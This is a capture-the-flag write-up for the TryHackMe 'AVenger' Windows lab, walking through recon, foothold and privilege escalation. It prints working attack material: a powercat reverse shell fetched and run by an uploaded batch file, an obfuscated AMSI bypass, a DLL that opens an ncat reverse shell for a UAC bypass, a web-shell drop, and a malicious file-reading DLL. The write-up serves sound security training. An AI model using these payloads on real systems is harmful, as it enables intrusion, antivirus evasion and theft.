AVenger

You’ve been asked to exploit all the vulnerabilities present. - by andrea526

TryHackMe | AVengerTryHackMe

The following post by 0xb0b is licensed under CC BY 4.0

Recon

By scanning our target with Nmap, we can discover several open ports. Notable services include HTTP on port 80, HTTPS on port 443, Microsoft RPC on port 135, NetBIOS on port 139, SMB on port 445, RDP on port 3389, WinRM on port 5985, dynamic RPC on port 47001, and additional dynamic RPC ports ranging from 49664 to 49669, as well as specific ports 49676 and 49677.

For a more detailed scan, we specify a service and default script scan on the initially found ports.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ nmap -sT -sV -sC -Pn -p 80,135,139,443,445,3389,5985,47001,49664-49669,49676,49677 avenger.thm -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-25 10:37 EST
Nmap scan report for avenger.thm (10.10.41.159)
Host is up (0.036s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.5K  2022-06-15 16:07  applications.html
| 177   2022-06-15 16:07  bitnami.css
| -     2023-04-06 09:24  dashboard/
| 30K   2015-07-16 15:32  favicon.ico
| -     2023-06-27 09:26  gift/
| -     2023-06-27 09:04  img/
| 751   2022-06-15 16:07  img/module_table_bottom.png
| 337   2022-06-15 16:07  img/module_table_top.png
| -     2023-06-28 14:39  xampp/
|_
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Index of /
| tls-alpn: 
|_  http/1.1
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.5K  2022-06-15 16:07  applications.html
| 177   2022-06-15 16:07  bitnami.css
| -     2023-04-06 09:24  dashboard/
| 30K   2015-07-16 15:32  favicon.ico
| -     2023-06-27 09:26  gift/
| -     2023-06-27 09:04  img/
| 751   2022-06-15 16:07  img/module_table_bottom.png
| 337   2022-06-15 16:07  img/module_table_top.png
| -     2023-06-28 14:39  xampp/
|_
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-11-25T15:38:24+00:00; -17s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: GIFT
|   NetBIOS_Domain_Name: GIFT
|   NetBIOS_Computer_Name: GIFT
|   DNS_Domain_Name: gift
|   DNS_Computer_Name: gift
|   Product_Version: 10.0.17763
|_  System_Time: 2023-11-25T15:38:16+00:00
| ssl-cert: Subject: commonName=gift
| Not valid before: 2023-06-29T08:09:48
|_Not valid after:  2023-12-29T08:09:48
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: localhost, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -17s, deviation: 0s, median: -17s
| smb2-time: 
|   date: 2023-11-25T15:38:19
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.12 seconds

After finishing the Nmap scan, we run a Gobuster scan to enumerate all possible files and directories on the web server running at ports 80 and 443. We see that phpmyadmin is running, and the CMS WordPress is present.

During manual enumeration, /gift also turned out to be a WordPress page. The domain avenger.tryhackme also became clear from the sources. Next, we run the wpscan on the WordPress page /gift.

At first glance, we see a very low-hanging fruit. Forminator version 1.24.1 is in use. Which is also affected by the vulnerability of unauthenticated remote command execution in version 1.24.6 (CVE-2023-4596). This vulnerability would allow us to upload a reverse shell, which could then be accessed at /wp-content/uploads/<current_year>/<current_month>/shell.php to execute it.

There is also a forminator form on the /gift page. It seems perfect.

Checking the sources of the form, it is indeed a forminator form.

After a short amount of research, two exploits can be identified. The one from exploit.db does not appear to be directly transparent and clear. We first use the automated exploit from E1A, but quickly realize that we will fail. We are able to upload files with the exploit, but cannot find them in /wp-content/uploads/2023/11. Let's ignore this vulnerability and move on.

WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command ExecutionExploit Database

GitHub - E1A/CVE-2023-4596: PoC Script for CVE-2023-4596, unauthenticated Remote Command Execution through arbitrary file uploads.GitHub

Foothold

We stay at the form and try to upload an arbitrary image.

After uploading it, we'll get a decent hint. The message states that the team is delighted to review every message carefully.

So let us assume that someone or something is opening or executing whats uploaded.

Let's make a quick sanity check using an HTML file containing an image whose source points to our web server. A quick shoutout to amine04. Without the assumption and testing using an HTML file like amine04 suggested, I wouldn't be able to come this far. Like the box states "Think outside the box, unleash your inner prankster, and find unconventional solutions to outwit your opponents."

<img src="http://10.8.211.1:9000/cat.jpg"/>

After a really short duration, the file seems to have been opened by someone, and we see the picture gets loaded from our server.

With that in mind and the description of the room that there is Antivirus (AV) is enabled, we look up techniques to upload reverse shell evading AV. For this, there is a really good resource referring to that topic:

Evade Windows Defender reverse shell detection with PowercatSystem Weakness

The idea is to use powercat to create a reverse shell whose content is stored base64-encoded in a text file. The content of the file is downloaded to the target computer and executed using a batch file. The batch file is placed and executed by uploading it via the form.

Powercat (https://github.com/besimorhino/powercat) is a simple network utility used to perform low-level network communication operations. The tool is an implementation of the well-known Netcat in PowerShell.

To evade the Windows Defender antivirus software, we can encode reverse shell payload with Powercat. Powercat has a good feature to encode a command to Hexadecimal Array. This way, some of the basic security features can be bypassed.

The following version of powercat was used:

https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

To generate the powercat shell on our attacker machine, you can make use of the following commands:

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ LHOST=10.8.211.1
                                                                        
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ LPORT=49731
                                                                        
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ rshell=shell-49731.txt
                                                                        
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > /home/0xb0b/Documents/tryhackme/avenger/$rshell

An excerpt of the generated, encoded reverse shell

Create the batch file to download and execute the encoded powercat reverse shell using PowerShell. This batch file will be executed by someone or something after uploading it.

START /B powershell -c $code=(New-Object System.Net.Webclient).DownloadString('http://10.8.211.1:9000/shell-49731.txt');iex 'powershell -E $code'

After generating the shell, a listener on 49371 is created on the attacker machine. We upload the batch and see after a short duration that the text file containing the shell gets downloaded.

set up a listener

upload the batch file

providing the encoded reverse shell

The reverse shell connects, and we are the user hugo.

After our first look up, we head to the Desktop of hugo where the first flag can be found.

Privilege Escalation

During the enumeration process, we see that hugo is part of the administrator groups - nice. Lets check if UAC is present. Maybe we are able to bypass it. As Microsoft states, User Account Control is a security feature that requires a user's consent before running applications with administrator privileges.

User Account Control (UAC) is a key part of Windows security. UAC reduces the risk of malware by limiting the ability of malicious code to execute with administrator privileges.

With UAC, each application that requires the administrator access token must prompt the end user for consent. The only exception is the relationship that exists between parent and child processes. Child processes inherit the user's access token from the parent process. Both the parent and child processes, however, must have the same integrity level.

We query if UAC is enabled. The settings are at level5(default). It will ask the administrator to confirm to run non Windows binaries with high privileges.

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

First we make use of the encoded AMSI bypass of Fabian Mosh:

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

Next, we download the windows binary ncat.exe on the target machine using curl.

curl http://10.8.211.1:9000/ncat.exe -o C:\Users\hugo\Desktop\ncat.exe

To bypass the UAC we make use of Technique 2 of Morphs Blog. It makes use of abusing trusted folders, to hijack DLLs of elevated binaries. A quick guide can be found at https://notes.morph3.blog/windows/uac-bypass#technique-2. A more detailed explanation can be found here https://redteamer.tips/uac-bypass-through-trusted-folder-abuse/.

First we create a DLL which executes ncat to establish a reverse shell.

custom.cpp

#include <windows.h>


void exec_custom()
{
	WinExec("c:\\users\\hugo\\Desktop\\ncat.exe -e cmd.exe 10.8.211.1 49732", 1);
}

bool APIENTRY DllMain( HMODULE hModule,
			DWORD ul_reason_for_call,
			LPVOID lpReserved
		)
{
	switch(ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		exec_custom();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return true;
}

We compile it using x86_64-w64-mingw32-gcc.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ x86_64-w64-mingw32-gcc -shared -o Secur32.dll custom.cpp

If you succeed in making folders with trailing slashes, Windows will interpret them as if the trailing slash was not there, however as you created the folder, you have full control over said folder.

So, as a regular user, you now created a folder Windows considers “trusted”, but you have full access on this folder, making you able to write whatever you want in there and execute it under auto elevation.

UAC bypass through Trusted Folder abuseRed Team Tips

After providing the machine with a version of ncat and having the DLL prepared, we create the folders with trailing spaces, tricking windows. We place the elevated executable computerdefaults.exe in there that is using the Secur32.dll. Next we download our custom Secur32.dll and place it also in C:\Windows \System32\.

mkdir "C:\Windows \"
mkdir "C:\Windows \System32\"
copy "C:\Windows\System32\computerdefaults.exe" "C:\Windows \System32\computerdefaults.exe"
curl http://10.8.211.1:9000/Secur32.dll -o "C:\Windows \System32\Secur32.dll"
"C:\Windows \System32\computerdefaults.exe"

creating the folders and placing the computerdefaults.exe binary

downloading the custom dll and checking the contents of C:\Windows \System32\

running computerdefaults.exe

After executing "C:\Windows \System32\computerdefaults.exe" our reverse shell connects, and we are able to access the root flag at C:\Users\Administrator\Desktop.

Unintended Privilege Escalation I

This was my initial way of escalating privileges. For some reason, the information gathered in this approach is only accessible while using a (powercat) reverse shell provided by a batch, as described here in the following. For some reason, it does not work with an HTA-Shell uploaded via the form.

During the enumeration process, we see that hugo is part of the administrator groups - nice. We know that there is an open RDP port, so eventually we are able to retrieve the credentials of the user and use them to RDP into the machine. There, we could easily run stuff as administrator with being able to interact with the UAC.

We query if UAC is enabled. The settings are at level5(default). It will ask the administrator to confirm to run non Windows binaries with high privileges.

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

To further enumerate the target on how to bypass the UAC or find other ways to escalate privileges, we want to make use of PowerUp.ps1. Since the target is still under AV protection, we try to bypass it. Especially the Antimalware Scan Interface (AMSI).

AMSI is a Microsoft technology that enables applications to collaborate with antimalware products for real-time scanning of code and data in memory. It enhances security by allowing dynamic analysis of scripts and code executions to detect and prevent potential malware threats.

Several attempts like downgrading PowerShell or using different payloads were made to bypass AMSI, like the example below shows.

A good resource regarding that AV evasion topic is the following:

Here we make use of the encoded AMSI bypass of Fabian Mosh:

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

Other payloads can be found here:

https://github.com/0xsyr0/Red-Team-Playbooks/blob/master/5-Installation/5-Installation.md#fabian-mosch--matt-graeber-bypass

After applying the bypass, the PowerUp.ps1 can be downloaded from our web server. Having the PowerUp.ps1 file on the machine, we import the PowerUp module and utilize the Invoke-AllChecks. The Invoke-AllChecks is a function that runs all the checks included in the module. The function outputs results of the checks in a useful format and offers us suggestions for where to look regarding privilege escalation.

(New-Object System.Net.Webclient).DownloadString('http://10.8.211.1:9000/PowerUp.ps1') > PowerUp.ps1
. .\Powerup.ps1
Invoke-AllChecks

The following version of PowerUp.ps1 was used:

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

With that, we are able to spot two findings. First, there is a hijackable path, which we were not able to abuse yet and discussed in Further Ideas. Secondly, we get the credentials for the user hugo stored in the registry. When autologon is turned on, the password is stored in the registry in plain text. The registry can be queried manually using reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Privilege Escalation with AutorunsHackTricks

With those credentials, we hit up Remmina to get a remote desktop connection as the user hugo, recalling the open port 3389. From there, we are able to run the PowerShell terminal as an administrator since the user is part of the administrator group. The UAC just has to be confirmed. With the administrator PowerShell spawned, we head directly to C:\Users\Administrator\Desktop to find the root.txt flag there.

Unintended Privilege Escalation II

Another working approach was found by amine04. We discussed our different approaches to gaining root, and I want to briefly showcase the approach. A web shell can be placed at C:\xampp\htdocs. The web server seems to be running as NT Authority/System. With that web shell, all files can be accessed.

GitHub - calebstewart/pwncat: Fancy reverse and bind shell handlerGitHub

Unfortunately, there is an error when running the following command to download the reverse shell.

(New-Object System.Net.WebClient).DownloadString('http://10.8.211.1:9000/p0wny-shell/shell.php') > shell.php

There might be an encoding error that leads to the PHP page not being evaluated correctly.

With cURL, we are able to download the shell correctly.

curl http://10.8.211.1:9000/p0wny-shell/shell.php -o C:\xampp\htdocs\shell.php

Accessing the web shell at http://avenger.tryhackme/shell.php gives us then full access on the system.

Further Ideas

Another approach was discussed with 0day. Recalling the PowerUp Finding of Hijackable Path. A working exploit has not been found yet, but I am still trying. But referring to https://juggernaut-sec.com/dll-hijacking/ Hijacking the Service DLL to get a SYSTEM Shell a restart of the machine is required, which we are not able to do so. The following approach was introduced by 0day. The snippet below is a modified version of his testing malicious DLL to capture the contents of C:\Users\Administrator\Desktop of which was tested on a VM.

test.cs

using System;
using System.IO;

public class ListDesktopContents
{
    static ListDesktopContents()
    {
        string desktopPath = "C:\\Users\\Administrator\\Desktop";
        string outputFile = "C:\\temp\\desktop_contents.txt";

        try
        {
            string[] files = Directory.GetFiles(desktopPath);
            string[] directories = Directory.GetDirectories(desktopPath);

            using (StreamWriter writer = new StreamWriter(outputFile, false))
            {
                foreach (string file in files)
                {
                    writer.WriteLine("File: " + file);

                    // Read and write the contents of the file
                    try
                    {
                        string fileContents = File.ReadAllText(file);
                        writer.WriteLine("Contents: " + fileContents);
                    }
                    catch (Exception ex)
                    {
                        writer.WriteLine("Error reading file contents: " + ex.ToString());
                    }
                }

                foreach (string dir in directories)
                {
                    writer.WriteLine("Directory: " + dir);
                }
            }
        }
        catch (Exception ex)
        {
            File.WriteAllText(outputFile, ex.ToString());
        }
    }
}

Compile the custom DLL.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/avenger]
└─$ mcs -target:library -out:RunCommand.dll test.cs
                                                    

Use the Write-HijackDll CMDLet to place a Command into the vulnerable DLL.

Write-HijackDll -OutputFile 'C:\Users\hugo\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command 'C:\Users\hugo\Desktop\RunCommand.dll'